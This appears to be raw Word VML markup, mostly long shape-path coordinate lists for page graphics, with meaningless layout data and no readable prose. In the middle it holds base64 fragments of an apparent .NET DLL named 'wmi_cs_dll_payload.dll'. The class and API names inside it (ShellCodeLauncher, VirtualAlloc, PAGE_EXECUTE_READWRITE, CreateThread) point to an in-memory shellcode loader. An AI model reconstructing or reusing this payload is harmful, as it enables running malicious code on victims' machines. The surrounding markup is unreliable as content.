00,13567,2800,13571,2800,13575,2800,13579,2800,13583,2800,13588,2800,13592,2800,13597,2800,13601,2800,13606,2800,13611,2800,13616,2800,13621,2800,13626,2800,13631,2800,13637,2800,13642,2800,13648,2800,13653,2800,13659,2800,13665,2800,13671,2800,13677,2800,13683,2800,13690,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2798,13696,2798,13696,2798,13696,2798,13696,2798,13696,2797,13696,2797,13696,2797,13696,2797,13696,2796,13696,2796,13696,2795,13696,2795,13696,2795,13696,2794,13696,2794,13696,2793,13696,2793,13696,2793,13696,2792,13696,2792,13696,2791,13696,2790,13696,2790,13696,2789,13696,2789,13696,2788,13696,2787,13696,2787,13696,2786,13696,2785,13696,2784,13696,2783,13696,2783,13696,2782,13696,2781,13696,2780,13696,2779,13696,2778,13696,2777,13696,2776,13696,2775,13696,2774,13696,2773,13696,2772,13696,2770,13696,2769,13696,2768,13696,2767,13696,2765,13696,2764,13696,2763,13696,2761,13696,2760,13696,2758,13696,2757,13696,2755,13696,2753,13696,2752,13696,2750,13696,2748,13696,2747,13696,2745,13696,2743,13696,2741,13696,2739,13696,2737,13696,2735,13696,2733,13696,2731,13696,2729,13696,2727,13696,2725,13696,2723,13696,2720,13696,2718,13696,2716,13696,2713,13696,2711,13696,2708,13696,2706,13696,2703,13696,2700,13696,2698,13696,2695,13696,2692,13696,2689,13696,2686,13696,2683,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13694,2680,13694,2680,13694,2680,13694,2680,13693,2680,13693,2680,13693,2680,13692,2680,13692,2680,13691,2680,13691,2680,13690,2680,13690,2680,13689,2680,13689,2680,13688,2680,13688,2680,13687,2680,13686,2680,13685,2680,13685,2680,13684,2680,13683,2680,13682,2680,13681,2680,13680,2680,13679,2680,13678,2680,13677,2680,13676,2680,13675,2680,13673,2680,13672,2680,13671,2680,13669,2680,13668,2680,13666,2680,13665,2680,13663,2680,13662,2680,13660,2680,13658,2680,13656,2680,13654,2680,13652,2680,13650,2680,13648,2680,13646,2680,13644,2680,13642,2680,13639,2680,13637,2680,13635,2680,13632,2680,13629,2680,13627,2680,13624,2680,13621,2680,13618,2680,13615,2680,13612,2680,13609,2680,13606,2680,13603,2680,13600,2680,13596,2680,13593,2680,13589,2680,13586,2680,13582,2680,13578,2680,13574,2680,13570,2680,13566,2680,13562,2680,13558,2680,13553,2680,13549,2680,13545,2680,13540,2680,13535,2680,13530,2680,13526,2680,13521,2680,13516,2680,13510,2680,13505,2680,13500,2680,13494,2680,13489,2680,13483,2680,13477,2680,13472,2680,13466,2680,13460,2680,13453,2680,13447,2680,13441e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14050;width:130;height:270" coordorigin="2670,14050" coordsize="130,270" path="m2680,14071l2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2683,14071,2683,14071,2683,14071,2683,14071,2684,14071,2684,14071,2684,14071,2685,14071,2685,14071,2685,14071,2686,14071,2686,14071,2686,14071,2687,14071,2687,14071,2688,14071,2688,14071,2689,14071,2689,14071,2690,14071,2690,14071,2691,14071,2692,14071,2692,14071,2693,14071,2694,14071,2694,14071,2695,14071,2696,14071,2697,14071,2697,14071,2698,14071,2699,14071,2700,14071,2701,14071,2702,14071,2703,14071,2704,14071,2705,14071,2706,14071,2707,14071,2708,14071,2709,14071,2710,14071,2712,14071,2713,14071,2714,14071,2715,14071,2717,14071,2718,14071,2720,14071,2721,14071,2723,14071,2724,14071,2726,14071,2727,14071,2729,14071,2731,14071,2732,14071,2734,14071,2736,14071,2738,14071,2740,14071,2741,14071,2743,14071,2745,14071,2747,14071,2749,14071,2752,14071,2754,14071,2756,14071,2758,14071,2760,14071,2763,14071,2765,14071,2768,14071,2770,14071,2773,14071,2775,14071,2778,14071,2780,14071,2783,14071,2786,14071,2789,14071,2792,14071,2794,14071,2797,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14073,2800,14073,2800,14073,2800,14073,2800,14074,2800,14074,2800,14074,2800,14075,2800,14075,2800,14076,2800,14076,2800,14077,2800,14077,2800,14078,2800,14078,2800,14079,2800,14079,2800,14080,2800,14081,2800,14082,2800,14082,2800,14083,2800,14084,2800,14085,2800,14086,2800,14087,2800,14088,2800,14089,2800,14090,2800,14091,2800,14092,2800,14094,2800,14095,2800,14096,2800,14098,2800,14099,2800,14101,2800,14102,2800,14104,2800,14105,2800,14107,2800,14109,2800,14111,2800,14113,2800,14115,2800,14117,2800,14119,2800,14121,2800,14123,2800,14125,2800,14128,2800,14130,2800,14132,2800,14135,2800,14138,2800,14140,2800,14143,2800,14146,2800,14149,2800,14152,2800,14155,2800,14158,2800,14161,2800,14164,2800,14167,2800,14171,2800,14174,2800,14178,2800,14181,2800,14185,2800,14189,2800,14193,2800,14197,2800,14201,2800,14205,2800,14209,2800,14214,2800,14218,2800,14222,2800,14227,2800,14232,2800,14237,2800,14241,2800,14246,2800,14251,2800,14257,2800,14262,2800,14267,2800,14273,2800,14278,2800,14284,2800,14290,2800,14295,2800,14301,2800,14307,2800,14314,2800,14320,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2798,14326,2798,14326,2798,14326,2798,14326,2798,14326,2797,14326,2797,14326,2797,14326,2797,14326,2796,14326,2796,14326,2795,14326,2795,14326,2795,14326,2794,14326,2794,14326,2793,14326,2793,14326,2793,14326,2792,14326,2792,14326,2791,14326,2790,14326,2790,14326,2789,14326,2789,14326,2788,14326,2787,14326,2787,14326,2786,14326,2785,14326,2784,14326,2783,14326,2783,14326,2782,14326,2781,14326,2780,14326,2779,14326,2778,14326,2777,14326,2776,14326,2775,14326,2774,14326,2773,14326,2772,14326,2770,14326,2769,14326,2768,14326,2767,14326,2765,14326,2764,14326,2763,14326,2761,14326,2760,14326,2758,14326,2757,14326,2755,14326,2753,14326,2752,14326,2750,14326,2748,14326,2747,14326,2745,14326,2743,14326,2741,14326,2739,14326,2737,14326,2735,14326,2733,14326,2731,14326,2729,14326,2727,14326,2725,14326,2723,14326,2720,14326,2718,14326,2716,14326,2713,14326,2711,14326,2708,14326,2706,14326,2703,14326,2700,14326,2698,14326,2695,14326,2692,14326,2689,14326,2686,14326,2683,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14324,2680,14324,2680,14324,2680,14324,2680,14323,2680,14323,2680,14323,2680,14322,2680,14322,2680,14321,2680,14321,2680,14320,2680,14320,2680,14319,2680,14319,2680,14318,2680,14317,2680,14317,2680,14316,2680,14315,2680,14314,2680,14313,2680,14312,2680,14311,2680,14310,2680,14309,2680,14308,2680,14307,2680,14306,2680,14305,2680,14304,2680,14302,2680,14301,2680,14300,2680,14298,2680,14297,2680,14295,2680,14294,2680,14292,2680,14290,2680,14288,2680,14287,2680,14285,2680,14283,2680,14281,2680,14279,2680,14276,2680,14274,2680,14272,2680,14270,2680,14267,2680,14265,2680,14262,2680,14260,2680,14257,2680,14254,2680,14252,2680,14249,2680,14246,2680,14243,2680,14240,2680,14236,2680,14233,2680,14230,2680,14227,2680,14223,2680,14219,2680,14216,2680,14212,2680,14208,2680,14204,2680,14200,2680,14196,2680,14192,2680,14188,2680,14184,2680,14179,2680,14175,2680,14170,2680,14166,2680,14161,2680,14156,2680,14151,2680,14146,2680,14141,2680,14136,2680,14130,2680,14125,2680,14119,2680,14114,2680,14108,2680,14102,2680,14096,2680,14090,2680,14084,2680,14077,2680,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14690;width:130;height:270" coordorigin="2670,14690" coordsize="130,270" path="m2680,14716l2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2683,14716,2683,14716,2683,14716,2683,14716,2684,14716,2684,14716,2684,14716,2685,14716,2685,14716,2685,14716,2686,14716,2686,14716,2686,14716,2687,14716,2687,14716,2688,14716,2688,14716,2689,14716,2689,14716,2690,14716,2690,14716,2691,14716,2692,14716,2692,14716,2693,14716,2694,14716,2694,14716,2695,14716,2696,14716,2697,14716,2697,14716,2698,14716,2699,14716,2700,14716,2701,14716,2702,14716,2703,14716,2704,14716,2705,14716,2706,14716,2707,14716,2708,14716,2709,14716,2710,14716,2712,14716,2713,14716,2714,14716,2715,14716,2717,14716,2718,14716,2720,14716,2721,14716,2723,14716,2724,14716,2726,14716,2727,14716,2729,14716,2731,14716,2732,14716,2734,14716,2736,14716,2738,14716,2740,14716,2741,14716,2743,14716,2745,14716,2747,14716,2749,14716,2752,14716,2754,14716,2756,14716,2758,14716,2760,14716,2763,14716,2765,14716,2768,14716,2770,14716,2773,14716,2775,14716,2778,14716,2780,14716,2783,14716,2786,14716,2789,14716,2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14721,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14748,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14831,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14960,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14944,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,268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"aAASABMBhAI+AFAgAAAAAIYYUgAKAAEAwCEAAAAAkQBYAA4AAQAAAAAAgACRIH8AFQABA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AAAAACA"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"AJEgjAAdAAUAAAAAAIAAkSCZACgACwAxIgAAAACRGDADDgANAAAAAQCtAAAAAgC5AAAAA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wC+AAAA"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"BADPAAAAAQDZAAAAAgDsAAAAAwD4AAAABAAHAQAABQANAQAABgAdAQAAAQAoAQAAAgAwA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REAUgAu"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"ACEAUgA0ACkAUgAKAAkAUgAKADkAUgAKAEkAwAJCAGEA1wJKAGkACgNPAGEADwNYAHEAU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gBkAHkA"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"UgAKACcAWwA5AC4AEwBpAC4AGwByAGMAKwA5AAgABgCRAAEAVQEAAAQAWwAnAwABBwB/A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AEAAAEJ"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"AIwAAQAAAQsAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAA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AABADsA"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"AAAAAAQAAwAAAAA8TW9kdWxlPgB3bWlfY3NfZGxsX3BheWxvYWQuZGxsAFByb2dyYW0AU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2hlbGxD"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"b2RlTGF1bmNoZXIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBNYWluAE1FTV9DT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01NSVQA"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"UEFHRV9FWEVDVVRFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MAQ3JlYXRlVGhyZWFkAFdha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XRGb3JT"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"aW5nbGVPYmplY3QAbHBTdGFydEFkZHIAc2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvd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GVjdABs"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"cFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZ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HdDcmVh"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"dGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uU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2VjdXJp"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"dHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5Q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WN0aW9u"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"AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0a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W9uc0F0"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"dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB3bWlfY3NfZGxsX3Bhe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WxvYWQA"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"Qnl0ZQA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57MEQxQTVERjAtRDZCNy00R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UUzLUJB"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"QzItOTY0MUUyREJCMDNFfQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5c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GUAX19T"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89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"dGF0aWNBcnJheUluaXRUeXBlU2l6ZT0zNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW50a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W1lSGVs"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90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"cGVycwBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludFB0c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gBvcF9F"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91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"eHBsaWNpdABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWFyc2hhbABDb3B5A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Fplcm8A"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92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"RGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyAC5jY3RvcgBTeXN0ZW0uU2VjdXJpdHkAV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W52ZXJp"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93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"ZmlhYmxlQ29kZUF0dHJpYnV0ZQAAAAAAAyAAAAAAAPBdGg231uNOusKWQeLbsD4ACLd6X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FYZNOCJ"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94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"AyAAAQMAAAECBgkHAAQJCQkJCQoABhgJCQkYCRAJBQACCRgJBSABARENBCABAQgEAQAAA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AMGERAH"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7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7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1,1510,2693,1510,2685,1510,2677,1510,2668,1510,2659,1510,2650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6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6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3,10484,3575,10484,3577,10484,3579,10484,3581,10484,3583,10484,3586,10484,3588,10484,3591,10484,3593,10484,3596,10484,3599,10484,3602,10484,3605,10484,3608,10484,3611,10484,3614,10484,3618,10484,3622,10484,3625,10484,3629,10484,3633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3,1517,3575,1517,3577,1517,3579,1517,3581,1517,3583,1517,3586,1517,3588,1517,3591,1517,3593,1517,3596,1517,3599,1517,3602,1517,3605,1517,3608,1517,3611,1517,3614,1517,3618,1517,3622,1517,3625,1517,3629,1517,3633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0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5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0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0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4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0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099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0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69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5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6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6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4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3,1510,9178,1510,9173,1510,9167,1510,9162,1510,9156,1510,9150,1510,9143,1510,9137,1510,9131,1510,9124,1510,9117,1510,9110,1510,9103,1510,9095,1510,9088,1510,9080,1510,9072,1510,9063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4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299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5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8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6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299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5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8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8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6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6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1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7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4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1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1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7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7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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13110" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:13110;width:8990;height:630" coordorigin="1490,13110" coordsize="8990,63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7,10484,13127,10484,13127,10484,13127,10484,13128,10484,13128,10484,13129,10484,13129,10484,13130,10484,13130,10484,13131,10484,13131,10484,13132,10484,13133,10484,13134,10484,13135,10484,13136,10484,13137,10484,13138,10484,13139,10484,13140,10484,13142,10484,13143,10484,13145,10484,13146,10484,13148,10484,13150,10484,13151,10484,13153,10484,13155,10484,13157,10484,13160,10484,13162,10484,13164,10484,13167,10484,13170,10484,13172,10484,13175,10484,13178,10484,13181,10484,13185,10484,13188,10484,13191,10484,13195,10484,13199,10484,13202,10484,13206,10484,13211,10484,13215,10484,13219,10484,13224,10484,13228,10484,13233,10484,13238,10484,13243,10484,13248,10484,13254,10484,13259,10484,13265,10484,13271,10484,13277,10484,13283,10484,13290,10484,13296,10484,13303,10484,13310,10484,13317,10484,13324,10484,13332,10484,13339,10484,13347,10484,13355,10484,13364,10484,13372,10484,13381,10484,13389,10484,13398,10484,13407,10484,13417,10484,13426,10484,13436,10484,13446,10484,13457,10484,13467,10484,13478,10484,13489,10484,13500,10484,13511,10484,13523,10484,13534,10484,13546,10484,13559,10484,13571,10484,13584,10484,13597,10484,13610,10484,13623,10484,13637,10484,13651,10484,13665,10484,13680,10484,13694,10484,13709,10484,13725,10484,13740,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10484,13756,10483,13756,10482,13756,10482,13756,10480,13756,10479,13756,10477,13756,10475,13756,10473,13756,10470,13756,10466,13756,10462,13756,10458,13756,10453,13756,10448,13756,10442,13756,10435,13756,10428,13756,10419,13756,10411,13756,10401,13756,10391,13756,10379,13756,10367,13756,10354,13756,10340,13756,10326,13756,10310,13756,10293,13756,10275,13756,10256,13756,10236,13756,10215,13756,10192,13756,10168,13756,10143,13756,10117,13756,10090,13756,10061,13756,10031,13756,9999,13756,9966,13756,9931,13756,9895,13756,9858,13756,9819,13756,9778,13756,9735,13756,9691,13756,9646,13756,9598,13756,9549,13756,9498,13756,9445,13756,9391,13756,9334,13756,9275,13756,9215,13756,9153,13756,9088,13756,9022,13756,8953,13756,8883,13756,8810,13756,8735,13756,8658,13756,8578,13756,8497,13756,8413,13756,8326,13756,8238,13756,8146,13756,8053,13756,7957,13756,7859,13756,7758,13756,7654,13756,7548,13756,7439,13756,7328,13756,7214,13756,7097,13756,6977,13756,6855,13756,6730,13756,6602,13756,6471,13756,6337,13756,6201,13756,6061,13756,5918,13756,5773,13756,5624,13756,5472,13756,5317,13756,5159,13756,4997,13756,4833,13756,4665,13756,4494,13756,4319,13756,4141,13756,3960,13756,3776,13756,3587,13756,3396,13756,3201,13756,3002,13756,2800,13756,2594,13756,2385,13756,2172,13756,1955,13756,1734,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13756,1510,13755,1510,13755,1510,13755,1510,13755,1510,13755,1510,13754,1510,13754,1510,13754,1510,13753,1510,13753,1510,13752,1510,13752,1510,13751,1510,13751,1510,13750,1510,13749,1510,13749,1510,13748,1510,13747,1510,13746,1510,13745,1510,13744,1510,13742,1510,13741,1510,13740,1510,13738,1510,13737,1510,13735,1510,13734,1510,13732,1510,13730,1510,13728,1510,13726,1510,13724,1510,13722,1510,13720,1510,13717,1510,13715,1510,13712,1510,13709,1510,13706,1510,13703,1510,13700,1510,13697,1510,13